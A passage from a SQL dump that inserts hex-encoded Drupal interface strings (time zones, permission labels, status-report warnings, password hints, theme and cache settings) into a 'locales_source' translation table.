(2552, 0x506163696669632f506f686e706569, '', '10.6.15'),
(2553, 0x506163696669632f506f7274204d6f7265736279, '', '10.6.15'),
(2554, 0x506163696669632f5261726f746f6e6761, '', '10.6.15'),
(2555, 0x506163696669632f53616970616e, '', '10.6.15'),
(2556, 0x506163696669632f546168697469, '', '10.6.15'),
(2557, 0x506163696669632f546172617761, '', '10.6.15'),
(2558, 0x506163696669632f546f6e676174617075, '', '10.6.15'),
(2559, 0x506163696669632f57616b65, '', '10.6.15'),
(2560, 0x506163696669632f57616c6c6973, '', '10.6.15'),
(2561, 0x555443, '', '10.6.15'),
(2562, 0x506c61696e, '', '10.6.15'),
(2563, 0x54696d652061676f, '', '10.6.15'),
(2564, 0x466f726d61743a2040646973706c6179, '', '10.6.15'),
(2565, 0x55524c20746f2066696c65, '', '10.6.15'),
(2566, 0x47656e657269632066696c65, '', '10.6.15'),
(2567, 0x52535320656e636c6f73757265, '', '10.6.15'),
(2568, 0x5461626c65206f662066696c6573, '', '10.6.15'),
(2569, 0x557365206465736372697074696f6e206173206c696e6b2074657874, '', '10.6.15'),
(2570, 0x5472616e736c617465202562756e646c655f6c6162656c2040656e746974795f6c6162656c, '', '9.5.10'),
(2571, 0x25747970655f6e616d653a20437265617465206e657720636f6e74656e74, '', '9.5.10'),
(2572, 0x25747970655f6e616d653a2044656c65746520616e7920636f6e74656e74, '', '9.5.10'),
(2573, 0x25747970655f6e616d653a2044656c657465206f776e20636f6e74656e74, '', '9.5.10'),
(2574, 0x25747970655f6e616d653a2044656c657465207265766973696f6e73, '', '9.5.10'),
(2575, 0x25747970655f6e616d653a204564697420616e7920636f6e74656e74, '', '9.5.10'),
(2576, 0x25747970655f6e616d653a2045646974206f776e20636f6e74656e74, '', '9.5.10'),
(2577, 0x25747970655f6e616d653a20526576657274207265766973696f6e73, '', '9.5.10'),
(2578, 0x25747970655f6e616d653a2056696577207265766973696f6e73, '', '9.5.10'),
(2579, 0x4e6f7465207468617420616e6f6e796d6f757320757365727320776974682074686973207065726d697373696f6e206172652061626c6520746f2064656c65746520616e7920636f6e74656e74206372656174656420627920616e7920616e6f6e796d6f757320757365722e, '', '9.5.10'),
(2580, 0x546f2064656c6574652061207265766973696f6e2c20796f7520616c736f206e656564207065726d697373696f6e20746f2064656c6574652074686520636f6e74656e74206974656d2e, '', '9.5.10'),
(2581, 0x4e6f7465207468617420616e6f6e796d6f757320757365727320776974682074686973207065726d697373696f6e206172652061626c6520746f206564697420616e7920636f6e74656e74206372656174656420627920616e7920616e6f6e796d6f757320757365722e, '', '9.5.10'),
(2582, 0x546f207265766572742061207265766973696f6e2c20796f7520616c736f206e656564207065726d697373696f6e20746f20656469742074686520636f6e74656e74206974656d2e, '', '9.5.10'),
(2583, 0x546f20766965772061207265766973696f6e2c20796f7520616c736f206e656564207065726d697373696f6e20746f20766965772074686520636f6e74656e74206974656d2e, '', '9.5.10'),
(2584, 0x53617665207065726d697373696f6e73, '', '9.5.10'),
(2585, 0x54686973207065726d697373696f6e20697320696e686572697465642066726f6d207468652061757468656e74696361746564207573657220726f6c652e, '', '9.5.10'),
(2586, 0x5468657265206973206461746120666f722074686973206669656c6420696e207468652064617461626173652e20546865206669656c642073657474696e67732063616e206e6f206c6f6e676572206265206368616e6765642e, '', '9.5.10'),
(2587, 0x54657874206172656120286d756c7469706c6520726f777329, '', '9.5.10'),
(2588, 0x5175657279, '', '10.6.15'),
(2589, 0x4e6f207175657279207761732072756e, '', '10.6.15'),
(2590, 0x41646d696e697374726174697665206e616d65, '', '10.6.15'),
(2591, 0x56696577206c616e6775616765, '', '9.5.10'),
(2592, 0x4c616e6775616765206f66206c6162656c7320616e64206f74686572207465787475616c20656c656d656e747320696e207468697320766965772e, '', '9.5.10'),
(2593, 0x41646d696e6973747261746976652074616773, '', '9.5.10'),
(2594, 0x456e746572206120636f6d6d612d736570617261746564206c697374206f6620776f72647320746f20646573637269626520796f757220766965772e, '', '9.5.10'),
(2595, 0x4e616d6520616e64206465736372697074696f6e, '', '9.5.10'),
(2596, 0x4170706c7920616e6420636f6e74696e7565, '', '10.6.15'),
(2597, 0x457863657074696f6e2076616c7565, '', '10.6.15'),
(2598, 0x4e6f6465204944, '', '9.5.10'),
(2599, 0x4f76657272696464656e207469746c65, '', '9.5.10'),
(2600, 0x546865207669657720256e616d6520686173206265656e2073617665642e, '', '10.6.15'),
(2601, 0x406c616e6775616765207472616e736c6174696f6e206f662074686520407479706520256c6162656c20686173206265656e2064656c657465642e, '', '9.5.10'),
(2602, 0x54686520256669656c64206461746520697320696e76616c69642e20506c6561736520656e7465722061206461746520696e2074686520666f726d61742025666f726d61742e, '', '9.5.11'),
(2603, 0x54686520666f6c6c6f77696e672040656e746974792d74797065207472616e736c6174696f6e732077696c6c2062652064656c657465643a, '', '9.5.10'),
(2604, 0x44656c65746520616c6c207472616e736c6174696f6e73, '', '9.5.10'),
(2605, 0x41726520796f75207375726520796f752077616e7420746f2064656c657465207468652040656e746974792d7479706520256c6162656c3f, '', '9.5.11'),
(2606, 0x54686520407479706520257469746c6520686173206265656e2064656c657465642e, '', '9.5.11'),
(2607, 0x416464206d656e75206c696e6b, '', '10.6.15'),
(2608, 0x546865207765627369746520656e636f756e746572656420616e20756e6578706563746564206572726f722e20506c656173652074727920616761696e206c617465722e, '', '9.5.11'),
(2609, 0x4c697374204f66204d656761204d656e75204974656d73, '', '10.6.15'),
(2610, 0x4d656761204d656e753a20406d656e75, '', '9.5.10'),
(2611, 0x406e616d65206669656c642069732072657175697265642e, '', '9.5.11'),
(2612, 0x556e7265636f676e697a656420757365726e616d65206f722070617373776f72642e203c6120687265663d223a70617373776f7264223e466f72676f7420796f75722070617373776f72643f3c2f613e, '', '9.5.11'),
(2613, 0x53657074656d626572, 'Long month name', '9.5.10'),
(2614, 0x4661696c656420746f2067657420617661696c61626c652075706461746520646174612e, '', '9.5.11'),
(2615, 0x546865206d657373616765206c616e677561676520636f64652e, '', '9.5.11'),
(2616, 0x596f7572206e616d65, '', '9.5.11'),
(2617, 0x596f757220656d61696c2061646472657373, '', '9.5.11'),
(2618, 0x53656e64206d657373616765, '', '9.5.11'),
(2619, 0x53756e646179, '', '9.5.11'),
(2620, 0x4f63746f626572, 'Long month name', '9.5.11'),
(2621, 0x4073697a65204742, '', '10.6.15'),
(2622, 0x2876657273696f6e204076657273696f6e20617661696c61626c6529, '', '10.6.15'),
(2623, 0x556e737570706f727465642072656c65617365, '', '10.6.15'),
(2624, 0x4e6f7420737570706f7274656421, '', '9.5.11'),
(2625, 0x4572726f72, '', '10.6.15'),
(2626, 0x5365637572697479207570646174653a, '', '9.5.11'),
(2627, 0x526571756972656d656e74732070726f626c656d, '', '10.6.15'),
(2628, 0x5374617475732044657461696c73, '', '10.6.15'),
(2629, 0x4572726f727320666f756e64, '', '9.5.11'),
(2630, 0x546865206461746162617365207365727665722076657273696f6e202576657273696f6e206973206c657373207468616e20746865206d696e696d756d2072657175697265642076657273696f6e20256d696e696d756d5f76657273696f6e2e, '', '9.5.11'),
(2631, 0x5761726e696e677320666f756e64, '', '10.6.15'),
(2632, 0x596f75722050485020696e7374616c6c6174696f6e20697320746f6f206f6c642e2044727570616c207265717569726573206174206c6561737420504850202576657273696f6e2e204974206973207265636f6d6d656e64656420746f207570677261646520746f205048502076657273696f6e20257265636f6d6d656e646564206f722068696768657220666f72207468652062657374206f6e676f696e6720737570706f72742e20536565203c6120687265663d22687474703a2f2f7068702e6e65742f737570706f727465642d76657273696f6e732e706870223e50485027732076657273696f6e20737570706f727420646f63756d656e746174696f6e3c2f613e20616e6420746865203c6120687265663d223a7068705f726571756972656d656e7473223e44727570616c2050485020726571756972656d656e74733c2f613e207061676520666f72206d6f726520696e666f726d6174696f6e2e, '', '10.6.15'),
(2633, 0x436865636b6564, 'Examined', '10.6.15'),
(2634, 0x446174616261736520737570706f7274, '', '10.6.15'),
(2635, 0x4d7953514c2c20506572636f6e61205365727665722c206f72206571756976616c656e74, '', '10.6.15'),
(2636, 0x5772697461626c6520283c656d3e7075626c69633c2f656d3e20646f776e6c6f6164206d6574686f6429, '', '10.6.15'),
(2637, 0x504850204d62737472696e6720457874656e73696f6e, '', '10.6.15'),
(2638, 0x436865636b20746865206d6573736167657320616e64203c6120687265663d223a75726c223e74727920616761696e3c2f613e2e, '', '10.6.15'),
(2639, 0x596f75722076657273696f6e206f662044727570616c206973206e6f206c6f6e67657220737570706f727465642e20557067726164696e67206973207374726f6e676c79207265636f6d6d656e64656421, '', '10.6.15'),
(2640, 0x5765646e6573646179, '', '10.6.15'),
(2641, 0x4e6f76656d626572, 'Long month name', '9.5.11'),
(2642, 0x4572726f7273, '', '9.5.11'),
(2643, 0x5761726e696e6773, '', '9.5.11'),
(2644, 0x4572726f72034572726f7273, '', '9.5.11'),
(2645, 0x5761726e696e67035761726e696e6773, '', '9.5.11'),
(2646, 0x436865636b656403436865636b6564, '', '9.5.11'),
(2647, 0x47656e6572616c2053797374656d20496e666f726d6174696f6e, '', '9.5.11'),
(2648, 0x44727570616c2056657273696f6e, '', '9.5.11'),
(2649, 0x57656220536572766572, '', '9.5.11'),
(2650, 0x4c6173742043726f6e2052756e, '', '9.5.11'),
(2651, 0x4c6173742072756e204074696d652061676f, '', '9.5.11'),
(2652, 0x6d6f726520696e666f726d6174696f6e, '', '9.5.11'),
(2653, 0x56657273696f6e, '', '9.5.11'),
(2654, 0x4070687076657273696f6e20283c6120687265663d223a75726c223e6d6f726520696e666f726d6174696f6e3c2f613e29, '', '9.5.11'),
(2655, 0x4d656d6f7279206c696d6974, '', '9.5.11'),
(2656, 0x4461746162617365, '', '9.5.11'),
(2657, 0x436f7665726167652068617320656e646564, '', '9.5.11'),
(2658, 0x3c6120687265663d223a7570646174655f7374617475735f7265706f7274223e55706461746520746f206120737570706f72746564206d696e6f723c2f613e20617320736f6f6e20617320706f737369626c6520746f20636f6e74696e756520726563656976696e6720736563757269747920757064617465732e, '', '9.5.11'),
(2659, 0x566973697420746865203c6120687265663d223a75726c223e72656c65617365206379636c65206f766572766965773c2f613e20666f72206d6f726520696e666f726d6174696f6e206f6e20737570706f727465642072656c65617365732e, '', '9.5.11'),
(2660, 0x4e6f7420656e61626c6564, '', '9.5.11'),
(2661, 0x54686520747275737465645f686f73745f7061747465726e732073657474696e67206973206e6f7420636f6e6669677572656420696e2073657474696e67732e7068702e20546869732063616e206c65616420746f2073656375726974792076756c6e65726162696c69746965732e204974206973203c7374726f6e673e686967686c79207265636f6d6d656e6465643c2f7374726f6e673e207468617420796f7520636f6e66696775726520746869732e20536565203c6120687265663d223a75726c223e50726f74656374696e6720616761696e7374204854545020484f5354204865616465722061747461636b733c2f613e20666f72206d6f726520696e666f726d6174696f6e2e, '', '9.5.11'),
(2662, 0x466f7220746865206265737420706572666f726d616e636520616e6420746f206d696e696d697a65206c6f636b696e67206973737565732c2074686520524541442d434f4d4d4954544544207472616e73616374696f6e2069736f6c6174696f6e206c6576656c206973207265636f6d6d656e6465642e2053656520746865203c6120687265663d223a706572666f726d616e63655f646f63223e73657474696e67204d7953514c207472616e73616374696f6e2069736f6c6174696f6e206c6576656c3c2f613e207061676520666f72206d6f726520696e666f726d6174696f6e2e, '', '9.5.11'),
(2663, 0x4e6f7420617661696c61626c65, '', '9.5.11'),
(2664, 0x497320726571756972656420696e2044727570616c2031302e302e, '', '10.6.15'),
(2665, 0x44657072656361746564207468656d657320666f756e643a20257468656d655f6c6973742e, '', '9.5.11'),
(2666, 0x497420697320706f74656e7469616c6c7920696e73656375726520746f20646973706c6179206f456d62656420636f6e74656e7420696e2061206672616d652074686174206973207365727665642066726f6d207468652073616d6520646f6d61696e20617320796f7572206d61696e2044727570616c20736974652c2061732074686973206d617920616c6c6f7720657865637574696f6e206f662074686972642d706172747920636f64652e203c6120687265663d223a75726c223e596f752063616e2073706563696679206120646966666572656e7420646f6d61696e20666f722073657276696e67206f456d62656420636f6e74656e7420686572653c2f613e2e, '', '9.5.11'),
(2667, 0x504850204f50636f64652063616368696e672063616e20696d70726f766520796f75722073697465277320706572666f726d616e636520636f6e736964657261626c792e204974206973203c7374726f6e673e686967686c79207265636f6d6d656e6465643c2f7374726f6e673e20746f2068617665203c6120687265663d22687474703a2f2f7068702e6e65742f6d616e75616c2f6f7063616368652e696e7374616c6c6174696f6e2e70687022207461726765743d225f626c616e6b223e4f5063616368653c2f613e20696e7374616c6c6564206f6e20796f7572207365727665722e, '', '9.5.11'),
(2668, 0x50726f746563746564, '', '9.5.11'),
(2669, 0x47443220696d616765206d616e6970756c6174696f6e20746f6f6c6b6974, '', '9.5.11'),
(2670, 0x496620746865207369746520697320657870657269656e63696e672070726f626c656d732077697468207065726d697373696f6e7320746f20636f6e74656e742c20796f75206d6179206861766520746f2072656275696c6420746865207065726d697373696f6e732063616368652e2052656275696c64696e672077696c6c2072656d6f766520616c6c2070726976696c6567657320746f20636f6e74656e7420616e64207265706c616365207468656d2077697468207065726d697373696f6e73206261736564206f6e207468652063757272656e74206d6f64756c657320616e642073657474696e67732e2052656275696c64696e67206d61792074616b6520736f6d652074696d652069662074686572652069732061206c6f74206f6620636f6e74656e74206f7220636f6d706c6578207065726d697373696f6e2073657474696e67732e2041667465722072656275696c64696e672068617320636f6d706c657465642c20636f6e74656e742077696c6c206175746f6d61746963616c6c792075736520746865206e6577207065726d697373696f6e732e203c6120687265663d223a72656275696c64223e52656275696c64207065726d697373696f6e733c2f613e, '', '9.5.11'),
(2671, 0x50485020415043752063616368696e672063616e20696d70726f766520796f75722073697465277320706572666f726d616e636520636f6e736964657261626c792e204974206973203c7374726f6e673e686967686c79207265636f6d6d656e6465643c2f7374726f6e673e20746f2068617665203c6120687265663d2268747470733a2f2f7777772e7068702e6e65742f6d616e75616c2f617063752e696e7374616c6c6174696f6e2e70687022207461726765743d225f626c616e6b223e415043753c2f613e20696e7374616c6c6564206f6e20796f7572207365727665722e, '', '9.5.11'),
(2672, 0x5375636365737366756c, '', '9.5.11'),
(2673, 0x4070657263656e742520284072656d61696e696e672072656d61696e696e6729, '', '9.5.11'),
(2674, 0x4d697373696e67207472616e736c6174696f6e73, '', '9.5.11'),
(2675, 0x4d697373696e67207472616e736c6174696f6e7320666f723a20406c616e6775616765732e2053656520746865203c6120687265663d223a75706461746573223e417661696c61626c65207472616e736c6174696f6e20757064617465733c2f613e207061676520666f72206d6f726520696e666f726d6174696f6e2e, '', '9.5.11'),
(2676, 0x596f7572207365727665722069732063617061626c65206f6620646973706c6179696e672066696c652075706c6f61642070726f67726573732c2062757420646f6573206e6f74206861766520746865207265717569726564206c69627261726965732e204974206973207265636f6d6d656e64656420746f20696e7374616c6c20746865203c6120687265663d22687474703a2f2f7065636c2e7068702e6e65742f7061636b6167652f75706c6f616470726f6772657373223e5045434c2075706c6f616470726f6772657373206c6962726172793c2f613e2e, '', '9.5.11'),
(2677, 0x4865726520796f752063616e2066696e6420612073686f7274206f76657276696577206f6620796f75722073697465277320706172616d65746572732061732077656c6c20617320616e792070726f626c656d73206465746563746564207769746820796f757220696e7374616c6c6174696f6e2e204974206d61792062652075736566756c20746f20636f707920616e64207061737465207468697320696e666f726d6174696f6e20696e746f20737570706f72742072657175657374732066696c6564206f6e2044727570616c2e6f7267277320737570706f727420666f72756d7320616e642070726f6a656374206973737565207175657565732e204265666f72652066696c696e67206120737570706f727420726571756573742c20656e73757265207468617420796f75722077656220736572766572206d6565747320746865203c6120687265663d223a73797374656d2d726571756972656d656e7473223e73797374656d20726571756972656d656e74732e3c2f613e, '', '9.5.11'),
(2678, 0x3c756c3e0a3c6c693e546f207374617274206f7665722c20796f75206d75737420656d70747920796f7572206578697374696e6720646174616261736520616e6420636f7079203c656d3e64656661756c742e73657474696e67732e7068703c2f656d3e206f766572203c656d3e73657474696e67732e7068703c2f656d3e2e3c2f6c693e0a3c6c693e546f207570677261646520616e206578697374696e6720696e7374616c6c6174696f6e2c2070726f6365656420746f20746865203c6120687265663d223a7570646174652d75726c223e757064617465207363726970743c2f613e2e3c2f6c693e0a3c6c693e5669657720796f7572203c6120687265663d223a626173652d75726c223e6578697374696e6720736974653c2f613e2e3c2f6c693e0a3c2f756c3e, '', '9.5.11'),
(2679, 0x44727570616c20616c726561647920696e7374616c6c6564, '', '9.5.11'),
(2680, 0x4a616e75617279, 'Long month name', '9.5.11'),
(2681, 0x5375626d6974, '', '10.6.15'),
(2682, 0x5b40666f726d5d20407375626a656374, '', '9.5.11'),
(2683, 0x406e616d6520286e6f7420766572696669656429, '', '9.5.11'),
(2684, 0x4073656e6465722d6e616d6520284073656e6465722d75726c292073656e742061206d657373616765207573696e672074686520636f6e7461637420666f726d2061742040666f726d2d75726c2e, '', '9.5.11'),
(2685, 0x3120796561720340636f756e74207965617273, '', '9.5.11'),
(2686, 0x54686520616c6961732025616c69617320697320616c726561647920696e2075736520696e2074686973206c616e67756167652e, '', '9.5.11'),
(2687, 0x476f20746f2066697273742070616765, '', '10.6.15'),
(2688, 0x46697273742070616765, '', '10.6.15'),
(2689, 0x476f20746f2070726576696f75732070616765, '', '10.6.15'),
(2690, 0x50726576696f75732070616765, '', '10.6.15'),
(2691, 0x4572726f722067656e65726174696e6720696d6167652c206d697373696e6720736f757263652066696c652e, '', '9.5.11'),
(2692, 0x4572726f722067656e65726174696e6720696d6167652c206d697373696e6720736f757263652066696c652e, '', '9.5.11'),
(2693, 0x43757272656e742070617373776f7264, '', '9.5.11'),
(2694, 0x526571756972656420696620796f752077616e7420746f206368616e67652074686520256d61696c206f722025706173732062656c6f772e203c6120687265663d223a726571756573745f6e65775f75726c22207469746c653d2253656e642070617373776f726420726573657420696e737472756374696f6e732076696120656d61696c2e223e526573657420796f75722070617373776f72643c2f613e2e, '', '9.5.11'),
(2695, 0x54686520656d61696c2061646472657373206973206e6f74206d616465207075626c69632e2049742077696c6c206f6e6c79206265207573656420696620796f75206e65656420746f20626520636f6e7461637465642061626f757420796f7572206163636f756e74206f7220666f72206f707465642d696e206e6f74696669636174696f6e732e, '', '9.5.11'),
(2696, 0x5365766572616c207370656369616c20636861726163746572732061726520616c6c6f7765642c20696e636c7564696e672073706163652c20706572696f6420282e292c2068797068656e20282d292c2061706f7374726f706865202827292c20756e64657273636f726520285f292c20616e64207468652040207369676e2e, '', '9.5.11'),
(2697, 0x436f6e6669726d2070617373776f7264, '', '9.5.11'),
(2698, 0x546f206368616e6765207468652063757272656e7420757365722070617373776f72642c20656e74657220746865206e65772070617373776f726420696e20626f7468206669656c64732e, '', '9.5.11'),
(2699, 0x5468697320697320616c736f20617373756d656420746f20626520746865207072696d617279206c616e6775616765206f662074686973206163636f756e7427732070726f66696c6520696e666f726d6174696f6e2e, '', '9.5.11'),
(2700, 0x54686973206163636f756e74277320707265666572726564206c616e677561676520666f7220656d61696c732e, '', '9.5.11'),
(2701, 0x53697465206c616e6775616765, '', '9.5.11'),
(2702, 0x416c6c6f77206f7468657220757365727320746f20636f6e7461637420796f7520766961206120706572736f6e616c20636f6e7461637420666f726d207768696368206b6565707320796f757220656d61696c20616464726573732068696464656e2e204e6f7465207468617420736f6d652070726976696c65676564207573657273207375636820617320736974652061646d696e6973747261746f727320617265207374696c6c2061626c6520746f20636f6e7461637420796f75206576656e20696620796f752063686f6f736520746f2064697361626c65207468697320666561747572652e, '', '9.5.11'),
(2703, 0x54696d65207a6f6e65, '', '9.5.11'),
(2704, 0x53656c656374207468652064657369726564206c6f63616c2074696d6520616e642074696d65207a6f6e652e20446174657320616e642074696d6573207468726f7567686f7574207468697320736974652077696c6c20626520646973706c61796564207573696e6720746869732074696d65207a6f6e652e, '', '9.5.11'),
(2705, 0x4c6f63616c652073657474696e6773, '', '9.5.11'),
(2706, 0x50617373776f726473206d617463683a, '', '9.5.11'),
(2707, 0x796573, '', '9.5.11'),
(2708, 0x6e6f, '', '9.5.11'),
(2709, 0x50617373776f726420737472656e6774683a, '', '9.5.11'),
(2710, 0x5265636f6d6d656e646174696f6e7320746f206d616b6520796f75722070617373776f7264207374726f6e6765723a, '', '9.5.11'),
(2711, 0x4d616b65206974206174206c656173742031322063686172616374657273, '', '9.5.11'),
(2712, 0x416464206c6f77657263617365206c657474657273, '', '9.5.11'),
(2713, 0x41646420757070657263617365206c657474657273, '', '9.5.11'),
(2714, 0x416464206e756d62657273, '', '9.5.11'),
(2715, 0x4164642070756e6374756174696f6e, '', '9.5.11'),
(2716, 0x4d616b6520697420646966666572656e742066726f6d20796f757220757365726e616d65, '', '9.5.11'),
(2717, 0x5765616b, '', '9.5.11'),
(2718, 0x46616972, '', '9.5.11'),
(2719, 0x476f6f64, '', '9.5.11'),
(2720, 0x5374726f6e67, '', '9.5.11'),
(2721, 0x4e657720736574, '', '9.5.11'),
(2722, 0x43686f6f7365206120736574206f662073686f72746375747320746f20757365, '', '9.5.11'),
(2723, 0x546865206e657720736574206973206372656174656420627920636f7079696e67206c696e6b732066726f6d20796f75722064656661756c742073686f7274637574207365742e, '', '9.5.11'),
(2724, 0x4120756e69717565206d616368696e652d7265616461626c65206e616d652e2043616e206f6e6c7920636f6e7461696e206c6f77657263617365206c6574746572732c206e756d626572732c20616e6420756e64657273636f7265732e, '', '10.6.15'),
(2725, 0x4368616e676520736574, '', '9.5.11'),
(2726, 0x4661696c656420746f20666574636820617661696c61626c652075706461746520646174613a, '', '9.5.11'),
(2727, 0x536565203c6120687265663d224075726c223e504850204f70656e53534c20726571756972656d656e74733c2f613e20696e207468652044727570616c2e6f72672068616e64626f6f6b20666f7220706f737369626c6520726561736f6e73207468697320636f756c642068617070656e20616e64207768617420796f752063616e20646f20746f207265736f6c7665207468656d2e, '', '9.5.11'),
(2728, 0x436865636b203c6120687265663d224075726c223e796f7572206c6f63616c2073797374656d206c6f67733c2f613e20666f72206164646974696f6e616c206572726f72206d657373616765732e, '', '9.5.11'),
(2729, 0x4572726f7220636865636b696e6720617661696c61626c652075706461746520646174612e, '', '9.5.11'),
(2730, 0x436865636b696e6720617661696c61626c65207570646174652064617461, '', '9.5.11'),
(2731, 0x547279696e6720746f20636865636b20617661696c61626c65207570646174652064617461202e2e2e, '', '9.5.11'),
(2732, 0x436865636b656420617661696c61626c6520757064617465206461746120666f7220257469746c652e, '', '9.5.11'),
(2733, 0x436865636b656420617661696c61626c6520757064617465206461746120666f72206f6e652070726f6a6563742e03436865636b656420617661696c61626c6520757064617465206461746120666f722040636f756e742070726f6a656374732e, '', '9.5.11'),
(2734, 0x41646420636f6e74656e7420626c6f636b, '', '10.6.15'),
(2735, 0x5468652076657273696f6e206f662044727570616c20796f7520617265207570646174696e672066726f6d20686173206265656e206175746f6d61746963616c6c792064657465637465642e, '', '10.6.15'),
(2736, 0x312070656e64696e67207570646174650340636f756e742070656e64696e672075706461746573, '', '10.6.15'),
(2737, 0x4170706c792070656e64696e672075706461746573, '', '10.6.15'),
(2738, 0x5374617274696e672075706461746573, '', '10.6.15');
INSERT INTO `locales_source` (`lid`, `source`, `context`, `version`) VALUES
(2739, 0x416e20756e7265636f76657261626c65206572726f7220686173206f636375727265642e20596f752063616e2066696e6420746865206572726f72206d6573736167652062656c6f772e204974206973206164766973656420746f20636f707920697420746f2074686520636c6970626f61726420666f72207265666572656e63652e, '', '10.6.15'),
(2740, 0x5570646174696e67, '', '10.6.15'),
(2741, 0x5570646174696e6720406d6f64756c65, '', '10.6.15'),
(2742, 0x55706461746573207765726520617474656d707465642e20496620796f7520736565206e6f206661696c757265732062656c6f772c20796f75206d61792070726f636565642068617070696c79206261636b20746f20796f7572203c6120687265663d223a75726c223e736974653c2f613e2e204f74686572776973652c20796f75206d6179206e65656420746f2075706461746520796f7572206461746162617365206d616e75616c6c792e, '', '10.6.15'),
(2743, 0x416c6c206572726f72732068617665206265656e203c6120687265663d223a75726c223e6c6f676765643c2f613e2e, '', '10.6.15'),
(2744, 0x416e20756e7265636f76657261626c65206572726f72206f636375727265642e205468652075706c6f616465642066696c65206c696b656c7920657863656564656420746865206d6178696d756d2066696c652073697a6520284073697a6529207468617420746869732073657276657220737570706f7274732e, '', '9.5.11'),
(2745, 0x5669657720696e666f726d6174696f6e206f6e2074686520406c6966656379636c6520737461747573206f6620746865207468656d6520407468656d65, '', '9.5.11'),
(2746, 0x426173653a2061745f636f72652028382e782d352e3129203c62723e47656e6572617465643a204d6f6e203173742c204d61792c2032303233202d2032313a3439, '', '10.6.15'),
(2747, 0x4120636c65616e2c2061636365737369626c652c20616e6420706f77657266756c2044727570616c2061646d696e697374726174696f6e207468656d652e, '', '10.6.15'),
(2748, 0x4120636c65616e2c2061636365737369626c652c20616e6420666c657869626c652044727570616c2066726f6e742d656e64207468656d652e, '', '10.6.15'),
(2749, 0x4120666c657869626c652c207265636f6c6f7261626c65207468656d652077697468206d616e7920726567696f6e7320616e64206120726573706f6e736976652c206d6f62696c652d6669727374206c61796f75742e, '', '9.5.11'),
(2750, 0x5468652064656661756c742061646d696e697374726174696f6e207468656d6520666f722044727570616c2038207761732064657369676e6564207769746820636c65616e206c696e65732c2073696d706c6520626c6f636b732c20616e642073616e732d736572696620666f6e7420746f20656d70686173697a652074686520746f6f6c7320616e64207461736b732061742068616e642e, '', '9.5.11'),
(2751, 0x416e20696e74656e74696f6e616c6c7920706c61696e207468656d652077697468206e6f207374796c696e6720746f2064656d6f6e7374726174652064656661756c742044727570616ce28099732048544d4c20616e64204353532e204c6561726e20686f7720746f206275696c64206120637573746f6d207468656d652066726f6d20537461726b20696e20746865203c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f646f63732f382f7468656d696e67223e5468656d696e672047756964653c2f613e2e, '', '10.6.15'),
(2752, 0x496e7374616c6c6564207468656d6503496e7374616c6c6564207468656d6573, '', '10.6.15'),
(2753, 0x53637265656e73686f7420666f7220407468656d65207468656d65, '', '10.6.15'),
(2754, 0x64656661756c74207468656d65, '', '10.6.15'),
(2755, 0x53657474696e677320666f7220407468656d65207468656d65, '', '10.6.15'),
(2756, 0x61646d696e697374726174696f6e207468656d65, '', '10.6.15'),
(2757, 0x53657420407468656d652061732064656661756c74207468656d65, '', '10.6.15'),
(2758, 0x5365742061732064656661756c74, '', '10.6.15'),
(2759, 0x556e696e7374616c6c20407468656d65207468656d65, '', '10.6.15'),
(2760, 0x556e696e7374616c6c6564207468656d6503556e696e7374616c6c6564207468656d6573, '', '10.6.15'),
(2761, 0x496e7374616c6c20407468656d65207468656d65, '', '10.6.15'),
(2762, 0x496e7374616c6c20407468656d652061732064656661756c74207468656d65, '', '10.6.15'),
(2763, 0x496e7374616c6c20616e64207365742061732064656661756c74, '', '10.6.15'),
(2764, 0x44656661756c74207468656d65, '', '10.6.15'),
(2765, 0x41646d696e697374726174696f6e207468656d65, '', '10.6.15'),
(2766, 0x43686f6f7365202244656661756c74207468656d652220746f20616c7761797320757365207468652073616d65207468656d65206173207468652072657374206f662074686520736974652e, '', '10.6.15'),
(2767, 0x557365207468652061646d696e697374726174696f6e207468656d65207768656e2065646974696e67206f72206372656174696e6720636f6e74656e74, '', '10.6.15'),
(2768, 0x436f6e74726f6c20776869636820726f6c65732063616e202256696577207468652061646d696e697374726174696f6e207468656d6522206f6e20746865203c6120687265663d223a7065726d697373696f6e73223e5065726d697373696f6e7320706167653c2f613e2e, '', '10.6.15'),
(2769, 0x53657420616e6420636f6e666967757265207468652064656661756c74207468656d6520666f7220796f757220776562736974652e2020416c7465726e6174697665203c6120687265663d223a7468656d6573223e7468656d65733c2f613e2061726520617661696c61626c652e, '', '10.6.15'),
(2770, 0x596f752063616e20706c61636520626c6f636b7320666f722065616368207468656d65206f6e20746865203c6120687265663d223a626c6f636b73223e626c6f636b206c61796f75743c2f613e20706167652e, '', '10.6.15'),
(2771, 0x416464206e6577207468656d65, '', '9.5.11'),
(2772, 0x31206d696e0340636f756e74206d696e, '', '9.5.11'),
(2773, 0x31206461790340636f756e742064617973, '', '9.5.11'),
(2774, 0x6e6f2063616368696e67, '', '10.6.15'),
(2775, 0x45787465726e616c207265736f75726365732063616e206265206f7074696d697a6564206175746f6d61746963616c6c792c2077686963682063616e2072656475636520626f7468207468652073697a6520616e64206e756d626572206f66207265717565737473206d61646520746f20796f757220776562736974652e, '', '10.6.15'),
(2776, 0x4d6f73742043415054434841206d6574686f64732077696c6c2064697361626c65207468652063616368696e67206f66207061676573207468617420636f6e7461696e2061204341505443484120656c656d656e742e20436865636b2074686520646966666572656e7420696d706c656d656e746174696f6e7320746f206b6e6f77206d6f72652061626f757420686f7720697420616666656374732063616368696e672e, '', '10.6.15'),
(2777, 0x436c65617220616c6c20636163686573, '', '10.6.15'),
(2778, 0x436c656172206361636865, '', '10.6.15'),
(2779, 0x42726f7773657220616e642070726f7879206361636865206d6178696d756d20616765, '', '10.6.15'),
(2780, 0x546869732069732075736564206173207468652076616c756520666f72206d61782d61676520696e2043616368652d436f6e74726f6c20686561646572732e, '', '10.6.15'),
(2781, 0x43415054434841, '', '10.6.15'),
(2782, 0x416767726567617465204353532066696c6573, '', '10.6.15'),
(2783, 0x416767726567617465204a6176615363726970742066696c6573, '', '10.6.15'),
(2784, 0x42616e647769647468206f7074696d697a6174696f6e, '', '10.6.15'),
(2785, 0x406e616d652063616e6e6f74206265206c6f6e676572207468616e20256d61782063686172616374657273206275742069732063757272656e746c7920256c656e6774682063686172616374657273206c6f6e672e, '', '9.5.11'),
